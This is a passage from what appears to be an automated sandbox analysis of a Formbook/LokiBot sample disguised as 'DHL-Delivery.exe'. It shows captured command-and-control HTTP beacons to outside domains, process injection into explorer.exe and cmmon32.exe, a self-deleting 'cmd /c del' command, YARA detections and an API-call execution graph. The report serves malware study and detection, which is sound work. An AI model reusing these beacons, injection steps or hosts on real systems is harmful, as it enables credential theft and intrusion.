eb ac 2a 1d 66 40 97 0a 9d 75 ab f5 75 a5 ed 89 44 a9 d8 70 43 69 ed 92 32 44 26 03 2b 41 ac 91 90 2c f0 60 fb 08 79 7e d1 cc 77 7e c7 28 96 be 0b af fb da a9 1e 86 b2 aa 14 0a b9 d9 07 7c 04 63 2c ac
                      Data Ascii: K@L_a3iPV`8(h0wG:<A?sTQBxf[B^8abuT[DE4RKA]l&O\urp2AK-!$rAlTJA8@T":U'qey$lkr!5RgDUIi]2;2_J4S{Vnx Y(!l@uuDBi2D&)A,py|r~(Y|c,N{.SQ#fjto=eW|S{gI96M^`__7{]4J)=9oAJL}OkdkU)gsHfLtnnf;*zp<g8W[6]%aX$iq9m0%t?IaS9L'@KiF4"FbxOa%/y8 H.h/Z+IV8faZ0-FDG8}2 7_TU:SI96Q^#I*Hp1{+H!,WCO~q6-0;&[&lrFg}04i9|V6 9n/Jy'=KZlnY0\_h+*^gn6a~#WlPT[DE4RKA]l&O\(ur~-h0/a8#ft_dOvjPR#";jj%{ 2@TB#p(Em9^O88k6![-]2;2_R4S7BNx Y(H*f@uuDpCi2D&+A,`y~w~(|c,
                      Jan 5, 2021 10:32:40.709130049 CET72INData Raw: 4e ce b3 c8 7b aa 1b 02 d1 3e f0 a4 15 53 51 df 95 33 66 6a 9d 74 6f cd ee b2 3d 75 fe f6 a4 57 7c f9 53 7f 7b 67 49 0c 89 84 39 ac 36 95 4d 94 dd 93 5e f8 60 5f 93 ae 1c b0 d3 5f 37 7b d4 9e 9d bf 5d 34 0a 87 16 4a 29 fc e9 3d 9d 39 a0 9a c9 03
                      Data Ascii: N{>SQ3fjto=uW|S{gI96M^`__7{]4J)=9oAJL}OkdkU)gsHfLtnnf;*zp<IL2#!4]5aTX$yq9m0%zt?IaS9L'@KiF4"FbxOa%/y8
                      Jan 5, 2021 10:32:40.709144115 CET73INData Raw: 52 23 be 22 1e f0 d1 d0 f4 cd f8 3b 1b a2 6a 6a ce 25 7b 20 93 a8 32 cb 1e fb 1e 13 ad 40 54 89 c6 ce 42 ba ba 17 dc 23 e4 93 13 13 b9 70 ad 98 f6 28 d2 db 45 6d bc 39 8e d9 a4 d9 5e d1 4f a6 0a 38 de aa 38 b7 a8 9d 6b 36 21 5b f4 8d 2d 0d 11 5d
                      Data Ascii: R#";jj%{ 2@TB#p(Em9^O88k6![-]2;2_R4S7BNx Y(H*f@uuDpCi2D&+A,`y~w~(|c,N{>SQ3fjto=uW|S{gI96M^`_
                      Jan 5, 2021 10:32:40.709224939 CET75INData Raw: 3b 26 d5 87 ef 9d 5b 26 1c 6c 72 46 67 f3 95 7d f0 a9 8e 30 34 a6 be 69 fb 39 84 7c 15 94 56 ce a5 18 1f 98 36 20 8d c6 00 39 f8 6e ba 2f df 9c 4a 79 8d b3 16 27 3d d3 93 4b a4 5a 8b 6c e8 b7 f4 6e e9 ad fa e9 c5 91 a1 b5 07 59 30 c8 b4 b9 5c 5f
                      Data Ascii: ;&[&lrFg}04i9|V6 9n/Jy'=KZlnY0\_h+*^gn6a~#WlPT[DE4RKA]l&O\(ur~-h0/a8#ft_dOvjPR#";jj%{ 2@TB#p(Em9
                      Jan 5, 2021 10:32:40.709243059 CET76INData Raw: a7 aa 7d dd d4 fb 11 11 6e 13 13 e9 94 6b a3 07 32 73 78 15 2c f2 f9 30 1f 6e a3 e2 b8 0a 2e c3 ef a5 a7 98 cb 1c 0c 6b c1 88 d0 a2 43 a3 5d dd 16 bb cb fd 31 61 d7 04 a0 e8 6e bc e4 da 01 bb c8 1b 60 86 dd ef cd 58 27 f8 9f b1 82 e1 30 a1 79 58
                      Data Ascii: }nk2sx,0n.kC]1an`X'0yXqMh^(w;k_T-P||f(o&WB3dw32#!g>!PzRUs,1XAS=sSefLdkzyv?CfMEMY({9c%[/
                      Jan 5, 2021 10:32:40.709256887 CET77INData Raw: fa 7b 9b b6 f3 a4 9f 22 9a f1 10 49 68 22 6c ec 96 0e 83 54 2b 14 4c 2c a0 d9 21 8e 2a 5a 3a 51 c8 f5 78 ed ea 89 a7 2e b8 8d c5 5f 65 3f 51 e4 cb 86 cf 58 19 f9 f1 90 46 30 e1 1c ca 73 98 12 34 6e 4a bd 50 52 3d 09 39 f3 50 9b 9a 29 e4 1a 72 47
                      Data Ascii: {"Ih"lT+L,!*Z:Qx._e?QXF0s4nJPR=9P)rGha4-5UFB*u/9HapU.5v-ly^1M@&C,Nq<oNA?##ua*R@[OHtw+wQj
                      Jan 5, 2021 10:32:40.709273100 CET79INData Raw: 84 7d 92 fc dd 1b 6c ce 58 f2 e6 6a 1d d2 d6 2d 24 99 d0 01 58 49 5c 8c 27 a1 2e c9 2d 81 35 19 2f 14 49 57 62 ee bc ab 54 33 08 1d f3 ee a2 a2 81 a0 db f5 37 e5 a1 2d 56 e1 a6 95 2e c8 b1 6b c9 02 73 c4 f7 29 3f 42 85 9e 86 df 44 f3 80 4e 84 70
                      Data Ascii: }lXj-$XI\'.-5/IWbT37-V.ks)?BDNpnB.ZG!mE)nreT8h~Wy!`~\_`tM'TI1!jcHL7e|;n)ZkkdPOAybQ(q=5_
                      Jan 5, 2021 10:32:40.709287882 CET80INData Raw: 25 d0 6d 4a 43 40 c1 07 91 0f a2 8b 0d 8d fc c9 4b e9 d8 38 8e 57 3a 63 df c3 94 17 48 9b ba ef a9 3d 6c 89 69 5e 4a f8 4c 60 a8 73 3c 0c a7 13 97 f8 eb 0b 32 c6 82 8a d2 f9 34 6b b7 7e c4 24 5a 3f f2 44 91 2d 75 21 5f b9 a6 fe af 39 7c 1b ce 3c
                      Data Ascii: %mJC@K8W:cH=li^JL`s<24k~$Z?D-u!_9|<&4bTPpv&k`JS{Ei_0jQYJU7=:u(2;N.~Rd?2#H~!`{![&.A[JRH9luJ.
                      Jan 5, 2021 10:32:40.709304094 CET82INData Raw: 4c 2d 6e dc 1d 4f 0d 3a 48 f2 d4 13 c1 31 33 ff 07 a0 12 77 f7 34 7d ba 2f 7c 01 32 ca d2 b9 90 e3 16 57 83 c2 c2 5d 64 1e 18 f9 ee 9a 37 82 0d c8 00 e2 1b 41 43 81 e7 7f 43 54 00 a0 2e af 08 e9 6b 68 2d c0 6e f6 75 8e 44 dd 5e d6 35 c3 fd 12 70
                      Data Ascii: L-nO:H13w4}/|2W]d7ACCT.kh-nuD^5p9%{{W;a6"J#J ?HyJ*O*.|o?OBIR7,.YTjCn1%<rLyTtiD[.(N:nqoMC\(T!Y
                      Jan 5, 2021 10:32:40.709319115 CET83INData Raw: 25 91 a0 a1 f9 b6 e5 21 af 2c 5d 1d b2 66 41 4a 8d 07 16 85 12 bc f2 87 5a ae 94 64 ed cb 84 d0 e5 e3 14 59 15 c5 f3 50 66 e3 11 4e 1c 0d 6f 8c 75 8c 8c 48 80 ed 8f 91 b9 83 ae d2 ab 18 74 c2 8f b8 c8 3e e5 b1 56 03 9b 8a 63 38 b0 d6 3b 01 3c a5
                      Data Ascii: %!,]fAJZdYPfNouHt>Vc8;<=/Il2#b]X5aBgiBBq^u`$<Iv9LS{F_/.hL6ChA]8cb.BZ?5]D*(:45>tMEh
                      Jan 5, 2021 10:32:40.859675884 CET84INData Raw: 9b c1 d3 32 a2 9a d4 be 74 f1 ee 10 3a 78 8d c3 3d 37 41 a2 2d 56 28 62 6a ad 17 b5 b4 c8 fd 8c 00 c9 e0 f6 81 81 45 78 20 44 a6 27 cf 40 3c 35 6d d1 0d e7 a3 68 0a 9d 75 20 a9 ed a1 6c 6a 44 a9 27 70 70 92 66 cf c6 85 dd 0b aa a2 53 91 90 2c 7b
                      Data Ascii: 2t:x=7A-V(bjEx D'@<5mhu ljD'ppfS,{<c3w~.%HO=m2+{U%Q 8xe%S;g9jlFy;33@%f1!y6ol(kI]V(oHf$z


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.0.804971734.102.136.18080C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Jan 5, 2021 10:34:34.826330900 CET1435OUTGET /mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1
                      Host: www.evolutionhvac.net
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Jan 5, 2021 10:34:34.932907104 CET1435INHTTP/1.1 403 Forbidden
                      Server: openresty
                      Date: Tue, 05 Jan 2021 09:34:34 GMT
                      Content-Type: text/html
                      Content-Length: 275
                      ETag: "5fd492b4-113"
                      Via: 1.1 google
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.0.8049719198.54.126.23880C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Jan 5, 2021 10:34:56.174650908 CET1455OUTGET /mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1
                      Host: www.officialilluminati.net
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Jan 5, 2021 10:34:56.335369110 CET1456INHTTP/1.1 301 Moved Permanently
                      Date: Tue, 05 Jan 2021 09:34:56 GMT
                      Server: Apache
                      Location: https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0
                      Content-Length: 354
                      Content-Type: text/html; charset=iso-8859-1
                      Connection: close
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 69 61 6c 69 6c 6c 75 6d 69 6e 61 74 69 2e 6e 65 74 2f 6d 70 68 2f 3f 37 6e 64 38 3d 66 59 49 37 62 6d 49 4f 38 31 2b 72 6f 5a 65 57 39 6c 72 58 74 79 42 42 37 41 43 73 33 35 72 76 54 54 33 4d 52 2b 7a 76 38 52 4f 51 78 6e 57 4c 31 51 4e 4d 35 4a 5a 65 35 74 39 51 30 45 2b 64 44 37 4f 59 4b 79 77 71 78 51 3d 3d 26 61 6d 70 3b 48 38 52 3d 4f 32 4d 34 78 30 79 68 39 34 36 4c 31 52 64 30 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.officialilluminati.net/mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&amp;H8R=O2M4x0yh946L1Rd0">here</a>.</p></body></html>


                      Code Manipulations

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      Analysis Process: DHL-Delivery.exe PID: 5880 Parent PID: 5912

                      General

                      Start time:10:31:28
                      Start date:05/01/2021
                      Path:C:\Users\user\Desktop\DHL-Delivery.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\DHL-Delivery.exe'
                      Imagebase:0x400000
                      File size:81920 bytes
                      MD5 hash:12BA338DE35E611AEF4461C94713A0FF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Visual Basic
                      Reputation:low

                      Chronological Activities

                      Analysis Process: DHL-Delivery.exe PID: 892 Parent PID: 5880

                      General

                      Start time:10:32:07
                      Start date:05/01/2021
                      Path:C:\Users\user\Desktop\DHL-Delivery.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\DHL-Delivery.exe'
                      Imagebase:0x400000
                      File size:81920 bytes
                      MD5 hash:12BA338DE35E611AEF4461C94713A0FF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      Reputation:low

                      Chronological Activities

                      Analysis Process: explorer.exe PID: 4472 Parent PID: 892

                      General

                      Start time:10:32:42
                      Start date:05/01/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:
                      Imagebase:0x7ff7add70000
                      File size:4413936 bytes
                      MD5 hash:C25CF941EE6C7927C0A2AB0CB7FABE0B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, Author: Florian Roth
                      Reputation:low

                      Chronological Activities

                      Analysis Process: cmmon32.exe PID: 6544 Parent PID: 4472

                      General

                      Start time:10:32:48
                      Start date:05/01/2021
                      Path:C:\Windows\SysWOW64\cmmon32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\cmmon32.exe
                      Imagebase:0x1350000
                      File size:36352 bytes
                      MD5 hash:DEAA709A71519E24B72574A666A82C2D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, Author: Florian Roth
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, Author: Florian Roth
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, Author: Florian Roth
                      • Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, Author: Florian Roth
                      Reputation:low

                      Chronological Activities

                      Analysis Process: cmd.exe PID: 936 Parent PID: 6544

                      General

                      Start time:10:32:52
                      Start date:05/01/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del 'C:\Users\user\Desktop\DHL-Delivery.exe'
                      Imagebase:0x1180000
                      File size:236032 bytes
                      MD5 hash:C43699F84A68608E7E57C43B7761BBB8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Chronological Activities

                      Analysis Process: conhost.exe PID: 1304 Parent PID: 936

                      General

                      Start time:10:32:52
                      Start date:05/01/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff645930000
                      File size:822272 bytes
                      MD5 hash:C221707E5CE93515AC87507E19181E2A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Chronological Activities

                      Analysis Process: WerFault.exe PID: 5676 Parent PID: 4472

                      General

                      Start time:10:33:30
                      Start date:05/01/2021
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464
                      Imagebase:0x7ff7ec180000
                      File size:509968 bytes
                      MD5 hash:875E5FDA571C26F3F6F53F603150497F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Chronological Activities

                      Analysis Process: explorer.exe PID: 5372 Parent PID: 728

                      General

                      Start time:10:33:43
                      Start date:05/01/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:explorer.exe
                      Imagebase:0x7ff7add70000
                      File size:4413936 bytes
                      MD5 hash:C25CF941EE6C7927C0A2AB0CB7FABE0B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Chronological Activities

                      Analysis Process: SearchUI.exe PID: 6804 Parent PID: 928

                      General

                      Start time:10:33:50
                      Start date:05/01/2021
                      Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      Wow64 process (32bit):false
                      Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                      Imagebase:0x7ff638470000
                      File size:12084232 bytes
                      MD5 hash:456EC8ADD234A97E7E4DFACE9DABA5EB
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:low

                      Chronological Activities

                      Disassembly

                      Code Analysis

                      Reset < >

                        Analysis Process: DHL-Delivery.exe PID: 5880 Parent PID: 5912 DHL-Delivery.exeUNIQUE

                        Execution Graph

                        Execution Coverage:2%
                        Dynamic/Decrypted Code Coverage:81%
                        Signature Coverage:47.1%
                        Total number of Nodes:622
                        Total number of Limit Nodes:54

                        Graph

                        execution_graph 65151 401350 #100 65152 21a4c4b TerminateProcess 65153 21a4c87 65152->65153 65190 21a4020 65152->65190 65154 21a9afd 51 API calls 65154->65190 65157 21a84db LoadLibraryA 65158 21a84ec 65157->65158 65159 21a83ac 65159->65157 65287 21a8b71 GetPEB 65159->65287 65161 21a841b 65163 21a8b71 51 API calls 65161->65163 65165 21a847d 65161->65165 65180 21a0928 65161->65180 65162 21a4a65 65164 21a8441 65163->65164 65164->65165 65167 21a8b71 51 API calls 65164->65167 65166 21a84da 65165->65166 65165->65180 65166->65157 65167->65165 65168 21a0b3c 65186 21a0bc7 65168->65186 65169 21aab16 51 API calls 65169->65190 65172 21a660d 65173 21a6673 65172->65173 65310 21a0712 51 API calls 65172->65310 65179 21a66aa 65173->65179 65311 21a07c6 51 API calls 65173->65311 65178 21a0aa6 NtSetInformationThread 65178->65180 65183 21a6712 65179->65183 65312 21a087d 51 API calls 65179->65312 65180->65168 65180->65178 65182 21a83ac 51 API calls 65180->65182 65194 21a9afd 65180->65194 65182->65180 65184 21a087d 65305 21a07ff 51 API calls 65184->65305 65309 21a087d 51 API calls 65186->65309 65187 21a0882 65189 21a4824 NtWriteVirtualMemory 65189->65190 65190->65154 65190->65159 65190->65162 65190->65168 65190->65169 65190->65184 65190->65189 65191 21a4938 65190->65191 65245 21a8334 GetPEB 65190->65245 65247 21a83ac 65190->65247 65274 21a4cf9 65190->65274 65306 21aab16 65191->65306 65195 21a83ac 48 API calls 65194->65195 65196 21a9b13 65195->65196 65197 21a83ac 48 API calls 65196->65197 65198 21a9b50 65197->65198 65199 21a9b80 GetPEB 65198->65199 65200 21a9bc8 65199->65200 65313 21aa407 NtProtectVirtualMemory 65200->65313 65202 21a9c94 65203 21a087d 65202->65203 65208 21a9d54 65202->65208 65236 21aa0d4 65202->65236 65314 21a07ff 51 API calls 65203->65314 65205 21a0882 65205->65180 65206 21a84db LoadLibraryA 65207 21a84ec 65206->65207 65207->65180 65209 21a83ac 65208->65209 65210 21aa0e1 65208->65210 65231 21a9e83 65208->65231 65209->65206 65211 21a8b71 48 API calls 65209->65211 65220 21aa18e 65210->65220 65223 21aa293 65210->65223 65212 21a841b 65211->65212 65213 21a847d 65212->65213 65214 21a8b71 48 API calls 65212->65214 65242 21a0928 65212->65242 65217 21a84da 65213->65217 65213->65242 65215 21a8441 65214->65215 65215->65213 65219 21a8b71 48 API calls 65215->65219 65216 21a83ac 48 API calls 65216->65242 65217->65206 65218 21a0b3c 65244 21a0bc7 65218->65244 65219->65213 65220->65209 65227 21aa1b4 65220->65227 65222 21aa3c9 65222->65180 65321 21aa407 NtProtectVirtualMemory 65223->65321 65225 21a660d 65229 21a6673 65225->65229 65316 21a0712 51 API calls 65225->65316 65226 21aa0a7 65319 21aa407 NtProtectVirtualMemory 65226->65319 65320 21aa407 NtProtectVirtualMemory 65227->65320 65228 21a9afd 48 API calls 65228->65242 65239 21a66aa 65229->65239 65317 21a07c6 51 API calls 65229->65317 65231->65218 65231->65226 65231->65242 65234 21aa289 65234->65180 65236->65180 65243 21a6712 65239->65243 65318 21a087d 51 API calls 65239->65318 65240 21a0aa6 NtSetInformationThread 65240->65242 65242->65216 65242->65218 65242->65228 65242->65240 65244->65180 65315 21a087d 51 API calls 65244->65315 65246 21a8363 65245->65246 65246->65190 65248 21a83d5 65247->65248 65249 21a84db LoadLibraryA 65248->65249 65251 21a8b71 49 API calls 65248->65251 65250 21a84ec 65249->65250 65250->65190 65252 21a841b 65251->65252 65253 21a8b71 49 API calls 65252->65253 65258 21a847d 65252->65258 65261 21a0928 65252->65261 65254 21a8441 65253->65254 65257 21a8b71 49 API calls 65254->65257 65254->65258 65255 21a83ac 49 API calls 65255->65261 65256 21a84da 65256->65249 65257->65258 65258->65256 65258->65261 65259 21a9afd 49 API calls 65259->65261 65260 21a0aa6 NtSetInformationThread 65260->65261 65261->65255 65261->65259 65261->65260 65262 21a0b3c 65261->65262 65263 21a0bc7 65262->65263 65322 21a087d 51 API calls 65263->65322 65265 21a660d 65266 21a6673 65265->65266 65323 21a0712 51 API calls 65265->65323 65271 21a66aa 65266->65271 65324 21a07c6 51 API calls 65266->65324 65273 21a6712 65271->65273 65325 21a087d 51 API calls 65271->65325 65275 21a4d1d 65274->65275 65275->65190 65276 21a6608 65275->65276 65326 21a087d 51 API calls 65276->65326 65278 21a660d 65279 21a6673 65278->65279 65327 21a0712 51 API calls 65278->65327 65284 21a66aa 65279->65284 65328 21a07c6 51 API calls 65279->65328 65286 21a6712 65284->65286 65329 21a087d 51 API calls 65284->65329 65292 21a0928 65287->65292 65288 21a8bba 65288->65161 65289 21a9afd 49 API calls 65289->65292 65290 21a83ac 49 API calls 65290->65292 65291 21a0aa6 NtSetInformationThread 65291->65292 65292->65288 65292->65289 65292->65290 65292->65291 65293 21a0b3c 65292->65293 65294 21a0bc7 65293->65294 65330 21a087d 51 API calls 65294->65330 65296 21a660d 65297 21a6673 65296->65297 65331 21a0712 51 API calls 65296->65331 65302 21a66aa 65297->65302 65332 21a07c6 51 API calls 65297->65332 65304 21a6712 65302->65304 65333 21a087d 51 API calls 65302->65333 65305->65187 65307 21aab38 65306->65307 65334 21a0928 51 API calls 65307->65334 65309->65172 65311->65179 65312->65183 65313->65202 65314->65205 65315->65225 65317->65239 65318->65243 65319->65236 65320->65234 65321->65222 65322->65265 65324->65271 65325->65273 65326->65278 65328->65284 65329->65286 65330->65296 65332->65302 65333->65304 65335 21a53ab 65336 21a53b5 CreateFileA 65335->65336 65337 401983 65338 40199b 65337->65338 65338->65338 65339 4021c2 VirtualAlloc 65338->65339 65340 4023ad 65339->65340 65340->65340 65341 40f274 __vbaChkstk 65342 40f2c8 9 API calls 65341->65342 65343 40f366 7 API calls 65342->65343 65344 40f45c 65342->65344 65343->65344 65345 40f3de __vbaVarDup #562 __vbaFreeVar 65343->65345 65346 40f480 __vbaObjSet 65344->65346 65347 40f465 __vbaNew2 65344->65347 65345->65344 65348 40f42e #704 __vbaStrMove __vbaFreeVar 65345->65348 65350 40f4cb 65346->65350 65347->65346 65348->65344 65351 40f4dc __vbaHresultCheckObj 65350->65351 65352 40f4ff 65350->65352 65351->65352 65353 40f52a __vbaObjSet 65352->65353 65354 40f50f __vbaNew2 65352->65354 65356 40f578 65353->65356 65354->65353 65357 40f589 __vbaHresultCheckObj 65356->65357 65358 40f5ac 65356->65358 65359 40f5b3 __vbaChkstk 65357->65359 65358->65359 65360 40f646 __vbaFreeObjList __vbaFreeVar __vbaChkstk 65359->65360 65361 40f6b9 65360->65361 65362 40f6e8 65361->65362 65363 40f6c8 __vbaHresultCheckObj 65361->65363 65364 40f725 __vbaObjSet 65362->65364 65365 40f70a __vbaNew2 65362->65365 65363->65362 65367 40f770 65364->65367 65365->65364 65368 40f7a1 65367->65368 65369 40f781 __vbaHresultCheckObj 65367->65369 65370 40f7b1 __vbaNew2 65368->65370 65371 40f7cc __vbaObjSet 65368->65371 65369->65368 65370->65371 65373 40f817 65371->65373 65374 40f828 __vbaHresultCheckObj 65373->65374 65375 40f84b 65373->65375 65376 40f852 __vbaLateIdCallLd 65374->65376 65375->65376 65377 40f889 